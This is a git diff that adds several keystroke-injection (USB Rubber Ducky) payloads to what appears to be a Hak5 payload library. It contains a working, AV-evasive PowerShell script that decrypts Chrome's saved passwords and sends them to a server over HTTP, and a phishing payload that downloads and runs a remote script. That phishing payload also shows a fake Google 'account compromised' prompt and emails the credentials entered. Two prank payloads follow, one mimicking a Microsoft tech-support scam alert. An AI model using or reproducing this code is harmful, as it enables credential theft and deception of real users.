Merge branch 'hak5:master' into master

payloads/library/exfiltration/chrome-exfil/README.md

@@ -0,0 +1,55 @@
+# Chrome saved-credentials exfiltration
+
+A script to exfiltrate Chrome browser credentials from a target. Entered
+interactively to bypass a lot of PowerShell-related AV triggers.
+
+The Chrome GET request exfil is low bandwidth, but shouldn't raise the same
+level of AV-detection alarm as Invoke-WebRequest.
+
+## Dependencies
+
+ * Windows 10
+ * PowerShell 5.1<br />
+   (or PowerShell 7.x if you want to capture post-Chrome-v80 passwords)
+ * Chrome
+
+## Configuration
+
+Change `http://localhost:8000/` to match a target-accessible server you've set
+up.
+
+## Example execution
+
+Passwords stored in Chrome:
+
+![](img/chrome.png)
+
+Ducky script running, with temporary Python server to capture the
+exfiltration:
+
+![](img/run.gif)
+
+The base64 string sent to the server
+(`aHR0cHM6Ly9leGFtcGxlLmNvbS8sZXhhbXBsZV91c2VyMSxleEBtcGwzUEFTU3cwckQh`)
+decodes to `https://example.com/,example_user1,ex@mpl3PASSw0rD!`.
+
+## Limitations
+
+There are various limitations around maximum URL lengths, you may run in to
+these with Chrome instances containing a lot of saved passwords. A ZIP
+compression pass would probably resolve this, or multiple GET requests.
+
+I haven't tested this with Unicode passwords.
+
+## Credits
+
+This script is based on the minification of my
+[chrome-decrypt.ps1](https://github.com/thisismyrobot/chrome-decrypt.ps1)
+script, which itself built upon these projects:
+
+ * https://github.com/p0z/CPD
+ * https://github.com/ValterBricca/SQLite.Net-PCL
+ * https://github.com/ericsink/SQLitePCL.raw
+ * https://github.com/byt3bl33d3r/chrome-decrypter
+ * https://github.com/agentzex/chrome_v80_password_grabber
+ * https://github.com/0xfd3/Chrome-Password-Recovery

payloads/library/exfiltration/chrome-exfil/payload.txt

@@ -0,0 +1,64 @@
+REM Title: Chrome Exfil
+REM Author: thisismyrobot
+REM Description: Opens PowerShell, grabs Chrome passwords, exfils via headless Chrome GET request.
+REM Target: Windows 10 (PowerShell + Chrome)
+REM Version: 1.0
+REM Category: Exfiltration
+DEFAULTDELAY 10
+DELAY 5000
+GUI r
+DELAY 250
+STRING powershell
+ENTER
+DELAY 2500
+STRING pwsh
+ENTER
+DELAY 2500
+STRING $d=Add-Type -A System.Security
+ENTER
+STRING $p='public static'
+ENTER
+STRING $g=""")]$p extern"
+ENTER
+STRING $i='[DllImport("winsqlite3",EntryPoint="sqlite3_'
+ENTER
+STRING $m="[MarshalAs(UnmanagedType.LP"
+ENTER
+STRING $q='(s,i)'
+ENTER
+STRING $f='(p s,int i)'
+ENTER
+STRING $z=$env:LOCALAPPDATA+'\Google\Chrome\User Data'
+ENTER
+STRING $u=[Security.Cryptography.ProtectedData]
+ENTER
+STRING Add-Type "using System.Runtime.InteropServices;using p=System.IntPtr;$p class W{$($i)open$g p O($($m)Str)]string f,out p d);$($i)prepare16_v2$g p P(p d,$($m)WStr)]string l,int n,out p s,p t);$($i)step$g p S(p s);$($i)column_text16$g p C$f;$($i)column_bytes$g int Y$f;$($i)column_blob$g p L$f;$p string T$f{return Marshal.PtrToStringUni(C$q);}$p byte[] B$f{var r=new byte[Y$q];Marshal.Copy(L$q,r,0,Y$q);return r;}}"
+ENTER
+STRING $s=[W]::O("$z\\Default\\Login Data",[ref]$d)
+ENTER
+STRING $l=@()
+ENTER
+STRING if($host.Version-like"7*"){$b=(gc "$z\\Local State"|ConvertFrom-Json).os_crypt.encrypted_key
+ENTER
+STRING $x=[Security.Cryptography.AesGcm]::New($u::Unprotect([Convert]::FromBase64String($b)[5..($b.length-1)],$n,0))}$_=[W]::P($d,"SELECT*FROM logins WHERE blacklisted_by_user=0",-1,[ref]$s,0)
+ENTER
+STRING for(;!([W]::S($s)%100)){$l+=[W]::T($s,0),[W]::T($s,3)
+ENTER
+STRING $c=[W]::B($s,5)
+ENTER
+STRING try{$e=$u::Unprotect($c,$n,0)}catch{if($x){$k=$c.length
+ENTER
+STRING $e=[byte[]]::new($k-31)
+ENTER
+STRING $x.Decrypt($c[3..14],$c[15..($k-17)],$c[($k-16)..($k-1)],$e)}}$l+=($e|%{[char]$_})-join''}
+ENTER
+STRING $r=[Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes(($l)-join','))
+ENTER
+STRING start-process "chrome" "--headless http://localhost:8000/?$r"
+ENTER
+DELAY 1000
+STRING exit
+ENTER
+DELAY 250
+STRING exit
+ENTER

payloads/library/phishing/duckyphish/duckyphish.ps1

@@ -0,0 +1,13 @@
+clear
+$mycredentials = Get-Credential
+Write-Host "ALERT your google account has been compromised! please enter your credentials for verification"
+
+$name = Read-Host "Username/Email"
+$pwd = Read-Host "password"
+
+
+
+
+Send-MailMessage -SmtpServer smtp.gmail.com -Port 587 -UseSsl -From sendingemailhere -To receiveemailhere -Subject 'Hello from the ducky' -Body ("$name $pwd") -Credential ($mycredentials)
+exit
+

payloads/library/phishing/duckyphish/duckyphish.txt

@@ -0,0 +1,25 @@
+REM SCRIPT CREATED BY MAKOZORT, WATCH THIS VIDEO ON HOW TO USE IT: https://youtu.be/NeD5kRLatOU
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w maximized
+ENTER
+DELAY 200
+REM now we read in the script as a scriptblock
+STRING $script = [scriptblock]::Create((New-Object Net.WebClient).DownloadString('LINK HERE'));
+DELAY 500
+ENTER
+DELAY 2000
+STRING Invoke-Command -ScriptBlock $script
+DELAY 500
+ENTER
+REM enter credentials for "Get-Credential" powershell module
+DELAY 500
+STRING firsthalfofemail
+SHIFT 2
+STRING gmail.com
+DELAY 500
+TAB
+STRING PASSWORD
+DELAY 500
+ENTER

payloads/library/prank/QuacKed_Again/payload.txt

@@ -0,0 +1,44 @@
+REM Title: QuacKed_Again
+REM Author: LulzAnarchyAnon
+REM Description: A Quack of a different flavor. This time a browser shortcut is created
+REM on the targets Desktop, and named mycloudbackup to peak the targets curiosity.
+REM It opens a browser image of my favorite Ducky, titled " The Face You Make. 
+REM When You Get Quacked" A BIT OF SELF-QUACKING just for FUN!
+REM Target: Windows 10  
+REM Props: Darren Kitchen and Hak5
+REM Version: 1.0
+REM Category: Prank
+
+
+DELAY 100
+MOUSE CLICK 2
+DELAY 100
+DOWNARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+ENTER
+DELAY 100
+DOWNARROW
+DELAY 100
+ENTER
+DELAY 100
+STRING https://memegenerator.net/img/instances/81735469/the-face-you-make-when-you-get-quacked.jpg
+DELAY 100
+ENTER
+DELAY 100
+STRING mycloudbackup
+DELAY 100
+ENTER

payloads/library/prank/WindowS_PoP_uP/WindowS_PoP_uP

@@ -0,0 +1,68 @@
+REM Title: WindowS_PoP_uP
+REM Author: LulzAnarchyAnon
+REM Description: Old School fun meets modern day with this payload. 
+REM Description: So for starters notepad is opened, and a few choice words are typed out ;)
+REM Afterwards the notepad file is saved as an Error.bat to the Desktop, and notepad closes.
+REM The hapless victim notices the new addition to the desktop, and begins to click away having
+REM no idea it's just a prank, As they sweat their way with hesitation through each mouse click.
+REM Only To See.... THIS IS ONLY A PRANK! at the END! As the last ok is clicked the pop up 
+REM closes FOREVER! Leaving the victim unsure of what just happened.... :)
+REM Target: Windows 10  
+REM Props: Darren Kitchen and I am Jakoby
+REM Version: 1.0
+REM Category: Prank
+
+
+GUI r
+DELAY 20
+STRING notepad 
+ENTER
+DELAY 100
+STRING @echo off
+STRING msg * ***COMPUTER HEALTH ALERT***
+DELAY 50
+ENTER
+STRING msg * Microsoft Security Error
+DELAY 50
+ENTER
+STRING msg * Due to suspicious activity on your computer
+DELAY 50
+ENTER
+STRING msg * Please contact a Microsoft Certified Technician
+DELAY 50
+ENTER
+STRING msg * +1877-600-4257 (Toll Free)
+DELAY 50
+ENTER
+STRING msg * Please wait ...........
+DELAY 50
+ENTER
+STRING msg * Please wait ...........
+DELAY 50
+ENTER
+STRING msg * Please wait ...........
+DELAY 50
+ENTER
+STRING msg * Please wait ...........
+DELAY 50
+ENTER
+STRING msg * THIS IS ONLY A PRANK!
+DELAY 50
+CTRL s
+DELAY 100
+STRING Microsoft Error.bat
+DELAY 200
+ALT d
+DELAY 200
+SHIFT 
+DELAY 200
+SPACE
+DELAY 200
+STRING Desktop
+DELAY 200
+ENTER
+DELAY 200
+ALT s
+DELAY 800
+ALT f
+SHIFT x